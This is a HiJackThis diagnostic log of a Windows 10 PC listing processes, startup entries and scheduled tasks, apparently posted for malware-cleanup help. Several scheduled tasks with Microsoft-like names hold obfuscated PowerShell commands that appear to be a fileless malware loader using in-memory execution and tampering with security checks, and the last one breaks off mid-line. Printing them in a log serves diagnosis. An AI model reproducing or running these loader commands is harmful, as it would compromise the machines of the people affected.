Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16
Platform: x64 Windows 10 (Home Single Language), 10.0.19044.1499 (ReleaseId: 2009, 21H2), Service Pack: 0
Time: 23.01.2022 - 13:21 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated: Yes
Ran by: CASPER (group: Administrators) on CASPERNIRVANA, FirstRun: yes
Chrome: 97.0.4692.71
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)
Boot mode: Normal
Running processes:
Number | Path
1 C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
1 C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
1 C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
1 C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
1 C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
1 C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
1 C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe
1 C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
1 C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
1 C:\Program Files (x86)\Steam\steam.exe
1 C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
1 C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\McCSPServiceHost.exe
1 C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
3 C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
1 C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
1 C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
1 C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
1 C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
1 C:\Program Files\Common Files\McAfee\VSCore_21_4\mcapexe.exe
1 C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
1 C:\Program Files\Elantech\ETDCtrl.exe
1 C:\Program Files\Elantech\ETDCtrlHelper.exe
1 C:\Program Files\Elantech\ETDService.exe
1 C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
1 C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
1 C:\Program Files\McAfee\WebAdvisor\servicehost.exe
1 C:\Program Files\McAfee\WebAdvisor\uihost.exe
1 C:\Program Files\Riot Vanguard\vgtray.exe
1 C:\Program Files\SteelSeries\GG\moments\SteelSeriesSvcLauncher.exe
1 C:\Program Files\SteelSeries\GG\SteelSeriesEngine.exe
1 C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe
1 C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservices.exe
1 C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
1 C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe
2 C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe
1 C:\Users\CASPER\Desktop\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\backgroundTaskHost.exe
4 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\igfxCUIService.exe
1 C:\Windows\System32\igfxHK.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\mfevtps.exe
1 C:\Windows\System32\MusNotification.exe
2 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchFilterHost.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SearchProtocolHost.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\snmp.exe
1 C:\Windows\System32\spoolsv.exe
82 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wbem\unsecapp.exe
1 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wermgr.exe
2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\System32\WUDFHost.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [SuggestionsURL_JSON] = https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630 - Yandex
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [URL] = https://yandex.com.tr/search/?text={searchTerms}&clid=2233630 - Yandex
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_271\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_271\bin\ssv.dll
O2 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll
O2-32 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O4 - HKCU\..\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent
O4 - HKCU\..\StartupApproved\Run: [com.blitz.app] = C:\Users\CASPER\AppData\Local\Programs\Blitz\Blitz.exe --autostart (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [DSL Host] = C:\Users\CASPER\AppData\Roaming\4C9F9BE4-4E44-4309-A6B4-69A5DA3242B1\DSL Host\dslhost.exe (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [OneDrive] = C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/03/09)
O4 - HKCU\..\StartupApproved\Run: [Spotify] = C:\Users\CASPER\AppData\Roaming\Spotify\Spotify.exe --autostart --minimized (2020/06/01)
O4 - HKCU\..\StartupApproved\Run: [Voicemod] = C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe (file missing) (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [Zoom] = (no file) (2021/03/12)
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\CASPER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NimoLive.lnk -> C:\Program Files (x86)\NimoLive\launcher.exe (2021/10/03)
O4 - HKLM\..\Run: [Cm108BSound] = C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe /h /d
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [SteelSeriesGG] = C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe -dataPath="C:\ProgramData\SteelSeries\GG" -dbEnv=production -auto=true
O4 - HKLM\..\StartupApproved\Run: [AdobeGCInvoker-1.0] = C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe (2020/09/29)
O4 - HKLM\..\StartupApproved\Run: [AvastUI.exe] = C:\Program Files\Avast Software\Avast\AvLaunch.exe /gui (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run: [ETDCtrl] = C:\Program Files\Elantech\ETDCtrl.exe (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RtHDVBg_Dolby] = C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE4 (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RTHDVCPL] = C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [tvncontrol] = C:\Program Files\TightVNC\tvnserver.exe -controlservice -slave (file missing) (2020/11/30)
O4 - HKLM\..\StartupApproved\Run: [Wondershare Helper Compact.exe] = C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/09/29)
O4 - HKLM\..\StartupApproved\Run32: [DivXMediaServer] = C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run32: [Intel Driver & Support Assistant] = C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe (2021/12/22)
O4 - HKLM\..\StartupApproved\Run32: [PMBVolumeWatcher] = C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe /SysAutoRun (2021/03/09)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2021/03/12)
O4 - HKLM\..\StartupApproved\Run32: [Wondershare Helper Compact.exe] = C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/11/09)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Local service')
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Network service')
O9 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9-32 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9-32 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O17 - DHCP DNS 1: 192.168.1.1
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-mfe-ipt: [CLSID] = {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe
O22 - Task: (activation) \Microsoft\Windows\Windows Activation Technologies\Windows Activation Technologies - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$vKuBCo='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';$qlygJ='nTevQxrioBYX';$fLUN=($qlygJ[7]+$qlygJ[2]+$qlygJ[5]);&$fLUN(&$fLUN ('''[Telvqxt.Encolvqding]::UTlvqF''+2*2*2+''.GelvqtStlvqring([Conlvqvert]::Fro''+''mlvqB''+''ase''+8*8+''Strilvqng(([relvqgex]:lvq:Malvqtchlvqes(''''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'''',''''.'''',''''RilvqghlvqtTlvqoLlvqeft'''')|FolvqrEalvqch {$lvq_lvq.vallvque}) -jlvqo''+''in ''''''''))-replvqlace''''llvqvq''''|&(''''ilvqelvqx'''');''-'+'rep'+'lace''lvq'''))"
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\NCH Software (empty)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\WINDOWS\system32\MusNotification.exe /RunOnAC EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\WINDOWS\system32\MusNotification.exe /RunOnBattery EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-523137893-4004670275-4196358549-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\Office 15 Subscription Heartbeat - C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (file missing)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentFallBack2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload mininterval:2880 (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentLogOn2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1 (file missing)
O22 - Task: \McAfee\DAD.Execute.Updates - C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.110\DADUpdater.exe
O22 - Task: \McAfee\McAfee Auto Maintenance Task Agent - {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \McAfee\McAfee DAT Built in test - C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe /hcmode=periodic /periodicruncount=5
O22 - Task: \McAfee\McAfee Idle Detection Task - {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "984122374;$DxF='QCNyeyJxqkjQiV';'}&(5gc_m bA*y-T8y*_).bNaqme4 (0''i.us0?i{n9_g 2hS_y7ust_ie_mgc;u7_s+i_5ngp+ _S8,ysy,t_e_dm.8iI6O!+;u+_s_i{]ng_8 iS_lys2_t0e6cm.q5R2uj)nti_i_m_6e.b!I]nr0te_2r7o_{pS4meir_,vi62c7e_=s;ayugsvdin2{gn {bMiwfc_rf0os_7o_f9xt.jhW5ia=n35_2+;s9pu-xbilq_ic_r ?ct_lay=sxszv T3sB3{n_dev6l0e1cga_)t_e8b vhmoti_xd -ic]E5,iv=/(_)cs;p[bu6b]1li86c0 gsst_va(treici_ =v55oi1_d_ 0_cj3qouEk_()y_{/bd5yt3?ek[_4]M{wm_E_zb=_[F{ig_les+./E9-xiigsat77s(9_WrU_djhb_yat1xvrt4v_r_gWU.o)!?z-Fi-klneb6.R!_e2a_odAkblelz_By-+tae_fs(3gW(U_njh)rywtdsvr_(vdrtxWUec)5:)_(blpy_t_te[c_]2)_oRe{2gsi21sttdr_y!k.Luto_craalxtMfa_/ch=fitnf-e.}_O0p8_endnS=u3_bKz{e4ym{(@x3WlU__SO_lF)TlrWA_3RuE8-\M/_i_c0.ro--suo6!ft-9\4Ch_TF.0\-Tl_IP_5W_Uy()._tGhe!stV5sa)l_3ueb4(_WzaUj_ih7yd!tv_{r1vg4rW=+U!,_)nu_el5lp/);b}isf_o(M}-m[E(tb=oq={n6+ul85l])_jrew7t(ui(rn_0;cis_nt4- 9y__Zg,_u_=m_MmtfE,b?u.L1_ebnq=gtlahi;={fo!ur_(__ink7tc 54lXywB[=_r0;__l_XreB ]_!y=_7yZ0_g_uus-13.;alw_XB_j+++ia){__M5m9_Eb,c[.l{0XB_)]_^_(=(_kb_y_tte_w)_Wk_U+i}P_V__xnzpU{c_1}4f){xUmo9id.I_U.+NK_p4+gtx8oiu7[]1v4p+2Xe/_!KWmaU.[_!lXn_Bpfk_K21w86]{w;}k{I_np1tP_6t_roz mn(gwy_sk=cj(yI}]nt.8P/tn}r)e80_;[dIn_{t_Phbtrb_ be77Jv4a=7(oqIn_0tkP9_trc1)_y0_Zglouw;-_NtmoA8lt_lo5vc_a4ste_7V=i/_rt6?u_a{qlM7_ewmy_orq_y{(dj(I6znqt[4Pt)4rs)cn(-,v13)0s,rvsedf+_ melgky_tk,aq(oIs_nt_sPht7ur)/f0l,irregzf4 34eJb_vq,k,0xu}1a07=00m[,[0d0x4b103)gk;Mi_a_rv_sha_a6lqr.C_4o_pt,y(9oMsm_9Eb}},20v_,moagoy2!k,_[y.Z9+gu8h)r;e[((+_c!Eraiv9h)lM!rar(5s)hvpal.u._Gl,et_9D?e8_leorg9a0qteqnF)oq)rF2_uon9yct3bi_o}mnP_4o_iv_nt_(e.r01(ml{gmy7lk,r/t6y8.pe=.otf?=(c01E9i+4v)y()h)_/()_];(}t_[D7_l_l,{Im03pfo9drt!=(eW[(Unwmt[dt/llh_WsU+_)]7.pxr_jivk5a_t-_e cfs6ti_at_/i4c_3 e[+xot7serjxn9 2uloionvg5k Ni_thA__ll=oopc_satriezV6=irn!t_u[_al5gM/e_kmot(r[y+v(I=anftrhPt__r} hwVttn,.rp3ef[1 zI__nt[1Prt.-r _7e_OwfCQ_],(I,gnt6iP]toer _xwet_,m,oer_e5wf a4I2njjtP7_t_rb5 V/]atC2c,U6bIyn/wt3hv2? 
zoZw3),?U?7In_)t23g!2 v8U_pv));9=}_ '']-r_ep0la_ce(''._(.i.)-'',/''$?1''_ -tre_pl5ac(e''rWUi'',)[c_ha6r]c(3_4)k -_rekplzac+e''dfK6'',l[c(ha]r]x(3?7)h);6[Exnveiroonamenntf]:3:Couryrernt!Di{remctbor_y=3pw}d;][TwB]k::ycjgoEy()-; '-replace('.qnIU(qnIU.qnIU.)'-replace'qnIU'),('$'+807/807)|&($DxF[12]+$DxF[4]+$DxF[7]);3684975378" (file missing)
O22 - Task: \Microsoft\Windows\MUI\578309983 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "2268987711;$WTPb='NnkreMT)ixg.nO(llAikcJ';$rep_var='b&(pgc_m kA*g-Try*b)._Na.mex ({''k_us-_i_nekg m6Suyo2stc_edm?_;u8_smio_ngvz bSr.ysw0teeu+m._0I1O2_;u_9s-ifyng_4 _Smoys_7tle=im.e)R(uw_ntymijm_fe./!Inn_ute_?ryo_fpSk5eprz2vi}tcme{2s;}2u5s{?in_jg/ zpMivzcdr?_osc_o_f}1t.t2Wli_kn3lz2_;0_puh.b+l_8ic__ 2chcla_3syssy r{_c_Y+en{0)d_e]9le]_g8au(te7k jv__oi-+d_ 63WJ0.i.m_j()ov;rp-0ub1dl7iz_c _]s_t}katf7i_ci. vh9ooi4ld 8-B?I?rMT09(v)u[{b9_y,t]ie[5=]ujr,FP.ct_x_)=F_(ikleze.60Elx_vish)tns(1(u6lyrCf!rax0j8hm0yti6v-rf,vr?=u_ycvCr88ad)}k?F.li_lsle.h_Rue_xadw}A.lg)lBm7y)tdqes,_(su!fyCe_roap_jh!(yht_{vrycvtr=}uyt9C}r2.a)_(:_(8_bye2tve.m[]_j)oRe8egnni0s__tr_)y+._oLot.cpa5!lM_ba/c_3hii_nte__.O5_p_e4_nS+_u[bc_Ke3lyb(j5@u_xy{Cqyra]jSrO2_FTk-W4A_zREy9\(Makicvgr-o8_so_rf,tp=\C}9TuF_9\T3_I1P-muy_yC/r_4a)d}.]Gf_etj2V8a,plu__e{(y,uy-_C,r_sajb_h_yf,tv5_r_v_4ru-.ylC1oradp,_n}uul__ln)6_;i_-f_(f4jF![P0t/gx=_3=1n=8ul,-l_)29re-ltbu_urnh0;gi4_nteh hs_4JJmiKi=s{jFd_Petl_x._2Lpegyngu_t_h=p;f=bobr__(ie_nftm. 
vl_n?bijD=9l0j;_5vn=9b_Dsa !/e=8sj_JJ_{Kp-_81;]hv8nazbD.,+_+jw){12j_Fk-Pt7ixr[_?vn[!b?D_v]^g_=s(gibyott9ed9)ud9y=C_3raj_OuU}eM9_nQwvqmk/.qq/?_8!!gkB+(_jnw4_zlj26lG_p3d!_,pa3qQ+ujwyC/_r9a4a[v__ndb91DB3?noB)ogt}_2=5j]];+h}5I__ntp_P.tr_r h]i)f_brNp_=c(zvIni?tfP)7trml)_0__;I,onxtwgPt}_rc {mzctrsln_)f=3_(1Ie5nto_P)tv)r)f5s{J_}JK-r;_Nt0tA_nl_lgloc__alt_peV5-idr__tu,[a_l]hMe1_meo,_ry_[(x(9_In_6tgP7ztrx_)q(t,-1{g)_,tarekqf[ e_ifhgr[Nd_,(+_Iyn_{tPzkt.r8_)0iw,4rp_eflm _z]wcso4n_fn_,0x8xe17w00!j05,?[0x=f4_0-8);5fM8a97rsjuhqa_8l.0nC6opapy0_(cjpxFPk(t_x.2,0.{,!i{_frj5N?,s8sJ{oJhKwe);36(7(?_WJ__i_m__)M_{a1radsho?a-l+!.Gq4eat3hDek4l4eg_gakgt/e0_Fo2hr/F?_uneqc+t]_io)8npP_1oi=2n_tr-erlc(xi__fr),Nn,07tyi7ple_0of8_(1W3{Jirpmr)6+))dz(j)__;}uz[iD4slli_I?m.7po_]r,t_p(u_byeCpyra0znhtv3dl1rl}u_oyCh_r=a?8)]oqpqr8_iv[_amtr_e j2s_t,_ato4ifc_m ec}x)t_]er_hn8 3dlovonig]- Np{t_A=2lla_ouc_]aty!e]V3mir=jt_u_xalo4Mye!6mo2or3y__(I_3n_t_{Ptpcr_ _/Np_=Poh}_q,c_r2eu{f _(Imn97tP,xtjr}_ e__pzn_9k,__Ion/wtP)ft=rh5 Ix!Q3o{0Xqf?,6rszef6f rIxsntcvPzt(gr x6KtMy]gL71,6Um_In?_t_31e2 a4A_vvyaqv7,dU7vInq!t_3h_2 _pj_b__ld_4)_;__} c''-)re]pl0acae''_.(=..t)''/,''_$1['' c-rxepalaoce_''uwyC_ra}'',6[c8ha_r]?(3_4)_ -6reipliac5e''7Bn/Bgft''_,[1ch2ar6](u37_))e;(jlsm $yensv:ete9mpr -_Di=|wfhe[re5{(_$_+.N1amie.nLe_ng,th! -,eqy 8f)-/antd(q(G/ett-Ayclx $o_.8Fu_ll8Na_me_)._Actcenss2.FfilheS8ys_texmR3igpht/s c-epq _''Dhel9et5e''/)}x)|xdevl;_[E_nv_irlon-me0nt.]:(:C6ur5reuntdDi]re?cthor_y=_pwvd;_[rtcY_n]i::aBIdMTf()=; ';'$rep_var -rep'+''+'lace($WTPb[11]+$WTPb[14]+$WTPb[11]+$WTPb[11]+$WTPb[7]),(''$''+321/321)'|&($WTPb[8]+$WTPb[4]+$WTPb[9])|&($WTPb[8]+$WTPb[4]+$WTPb[9]);9701108446"
O22 - Task: \Microsoft\Windows\MUI\88542446 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "6768699732;$Czjm='recmbL)bvxob.X(TrIiDFh';$rep_var='_&(_gc_m ,A*!-T{y*!).)Na,me_ (2''24us4_i_n/_g d_Spyvystwdeim9h;u_4s7ilfngk2 )S=zys__teehvm.u_I2O=y;u_.s_iu-ngb, aS_tysb_t_eqsm.q.Rtument(4ikm__e.9pI=nm_tew5rdoo_pS?meyra_vii_c}eacs;o=u7s_qin_ig_ vaMiu_cwrutos__o.f.7t.m_W_ieon3-=23;o3pu_mbel5xic_s lcd_la/bsvs__ jt9W6n/_Sz39{vd_selpqelg)_at2ge- {bvox+ind]d Nh0C}Q__OL?4(t)cj;p_huebs_li_rc_ txst_xa6t6_icfe ivk7oi{ld8 kjtWe{m/r_lw(dx)_{_abyvlt_e8_[]ase1X_wsk_ll1=j9Fi+_lpe36.Eh+x_io_stnps_(lhjl+gKdC-_vyu9uxe,yrh.3futnwwtu(jflj4KCfav1)3!?F2di.lvve._oR_ed_ad+_Aulq5lBx_yttnses_5(4jkvlK__Cov6myu8re_re_hfl_t3wvdtj-5l?K!_Cv?9)f:j4(b-_y4t=ge[-o]6)2iRe_4g_i_zst9trpyo2.Le3o_cr_alf_M)at?ch[]ilnr_e.,aO_p[[enn]S_u!_bKo_e?yi((@rgj[l__KC_rv1ScnOFbjT,WrxARm=Ea\(_Mi=ccdr]_os2yo_ff{t\g,CdT3{F\4{T_I9_Pj4_lsK(6Cv_b)e.,,Geh_t_Vpoalinu_e__(j_9l!K9yCv!_y_u(,er_5h_f_}tw_9t_jtylKe9Cdve5,n((u_l_{l)?e;!i]{f(__e7X-_sk9rl6=o4=n_uu2l/el)o_rse-)tuxar-n=u;i]_nstvo I]_Z_B(ve=0_eeX_3sk_,l/._2Le66n!gt_thds;yf(sor?0(0i/!nt_a ja_oTAlfDp=er0;,+a(Ts_AD8_ e!g]=I_/ZhBa!e-l-1o;m_aT+bAqDl_++_5)+{_deX_as}k_zl[x4a_T4,AD44]s^td=(gub}y?_tei1)ij_,lKm[C_vthDs8_k_l7_]4mdtqrf_/o__GfE200u_b}_f!.67j6r0e9gy5i_7wdfsYd=2_,oq_?x.,c+IweD8_4V]L3{Vqx0Mn3ni7ak5uy+o}qfs?C_]_5e+3/L_0qq4Gyxl1Gb/IU_p+0]y6C+0kU__4}(3_rEzj+?bk{6{dl?,lfb_VoC8_n,5zq_6_,=5mz}bBwo8Tf46lW5_qe3d7,.q=cjb7l1KplCvi([!alyTA7_DyAt_Wu_moaVm(93_5]6;oa}I4]n_t{oPt-ur7 c-YX_8O3xwu=(_dI_na_tP_tt1ry_)0r_;_Iq_ntg0P_to=r umCyacwlr13Zm=du(I3?n_t9=Ptb_r8)_/IZxoB2eud;Nm)t.Ai_lla.o/c_-at_]e7V5iirx_t_u(_al_/Mfeiymo5_r{y_e((]7I_ntutP{_t4r.?)(rd-61m}),ror)e)rf w8Y-X(_Ox__,_([eIns[txP?.tr4m)j0j-,rxneufj{ 
C77aal,3rZkm,_0_sx1}=0q0ik0,!f0_xsq40+z)k;/_Ma(grus,_hak_lb.3wCo!wp=y8g(e!kXbs?_klp0,_0,_,Y__X_Ohtx,_sI_Z_[Be_e)5;)f((_0N4C9xQO!qL_)nzMa8_rns_+ha]hlw._kGe_bt_D-5elqde?gcpat3]e7Fj,or/)Flu__nc/0tdi_1on{nP_olgin/,t1e6gr(=lY_X_hOxe(,tt0_yproe2o_gf(__NbC!_QO_sL_).t))8z(/)5m;})n[5D6_ll/,I_m_hpo2erbt_](jpml]K)7Cv!4n_t__dla!l_j[ilK__C_v__)]?wp_r}tiv_6att6,e 0,s_tswat5_irc5, eggx}t_!er(kn, 99lo_!nhgu+ N9ut_A)bllf4o[c-dat,]ejV+_ir9jtsuisal{xMcerpmo_2rby{o(I]vn_t_hPti1r= g_XL=jUgM6-,r_ce1f-[ I_cntt7}Pto_r_ [?Pe+cW_tb_K,(_Ign09tP5_tyryf S__XpY_=Zg(_,0r?mef_w 3I}_nt)wPrt,_r 37A!n_uaK1b,cUg_In+1tk3og2 blXyB[oVm0p,?Up=Inwnti3m92 _eEcn_{Lk_y)(;_.} [''-!re5pl-ac8e''s.(j.._)''o,''m$1_'' .-r}ep}lawcee''j}lKbCv_'',0[cgha_r]d(3a4)_ -ireppl9ac_e''wAW_uo3V''_,[nch6arx](537z))_;(fls_ $=enkv:)teamp, -)Dik|wxhe!re5{(6$_r.N_am-e.yLeyngith7 -6eq8 8f)-[an-d(_(G_et5-A9cl_ $g_.qFu_ll,Napmef).)Acnce6ssp.F4il3eS_ys+te5mR4ignhtxs 5-e{q _''Dgel)etpe''-)}j)|_de_l;([E_nv+ir7on_mewntv]:8:Cwurkre4nt6Di)rewct_or_y=_pwmd;k[j_WnnSz-]:_:tiWmnrwy()8; ';'$rep_var 